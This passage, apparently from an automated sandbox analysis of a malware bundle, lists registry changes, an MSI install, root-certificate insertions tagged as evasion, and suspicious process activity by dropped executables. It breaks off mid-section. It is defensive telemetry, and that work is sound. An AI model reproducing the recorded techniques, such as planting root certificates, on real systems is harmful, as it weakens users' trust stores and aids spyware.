Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f00000000020000000000106600000001000020000000f69d2452ea1a98872b86718acf3b33026e3dd29476bcf51e69df70d24a69d754000000000e8000000002000020000000ede235dfdd5ad0532e10e108403229ce2f40bf9c620a621696f5a103c722efe5200000002a0a1ec176dc2c173b09345954106760a35e5a50fcccadae2d82bc03470cbc484000000079121f674d00e355d1c0088049fa06079f0aadd7469054aaf09b062d41e897a202cb98b2ef37131dbe264c13e6b0e230a56879127ed9e0cfbe877d886e28e1c0	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f000000000200000000001066000000010000200000008e72fd6354efb12ebe2edfc66ff75e15df7bbd58c229cb966f960bb63e68bea1000000000e8000000002000020000000a4ee548705ed146920d9d602d8597ca670691bdc622b0c0bd46d6643bf291a879000000047c38cce812fe6861b486b599cfc8ac00ab82009bdc99d9015ee69c62839d47772fd9fa720f8812c9a11599dfcc7eaf286e78d5c5e2bd8061cdc7bd777f0f78f365f8ea4f01578718cfb8af2c06f3701a3d8ec6097e1b5640e0aa1a2b3dc9ef4bbff04c168f5677b63626c9de6236e04a691f06cb9ab5866f3e188ee99cc7d6208ad989ac4b61a2e3ba5a1d1c8ff0650400000000011210d6d9935da6b3115f3120290684bca6c3d73de4d64bebbe198b7bbab9f7d986502e105d8a656c4ad653e63f554628ec639731fff9e7e75d7ec20ff32df	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Modifies data under HKEY_USERS 3 IoCs

Processes:

msiexec.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Yonatan.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "2E72A6E77B6A70F46845C8932F3B3E32"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

installer.exegpooe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	gpooe.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	gpooe.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

9688 PING.EXE

pid	process
9688	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs

Processes:

001.exeinstaller.exegpooe.exeaskinstall39.exesetup.exerequest2.exeSunLabsPlayer.exe005.exeifhwwyy.exetoolspab1.exe42a25820.exe

pid	process
8532	001.exe
7628	installer.exe
5664	gpooe.exe
9844	askinstall39.exe
10068	setup.exe
3736	request2.exe
3880	SunLabsPlayer.exe
3944	005.exe
4064	ifhwwyy.exe
1164	toolspab1.exe
7908	42a25820.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ultramediaburner.tmpCyshupaelaenu.exe

pid	process
1000	ultramediaburner.tmp
1000	ultramediaburner.tmp
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe
1104	Cyshupaelaenu.exe

Suspicious behavior: MapViewOfSection 32 IoCs

Processes:

toolspab1.exe42a25820.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
7824	toolspab1.exe
7908	42a25820.exe
1264
1264
1264
1264
1264
1264
9724	explorer.exe
9724	explorer.exe
1264
1264
3552	explorer.exe
3552	explorer.exe
1264
1264
3720	explorer.exe
3720	explorer.exe
1264
1264
3716	explorer.exe
3716	explorer.exe
1264
1264
3948	explorer.exe
3948	explorer.exe
1264
1264
1812	explorer.exe
1812	explorer.exe
1264
1264

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

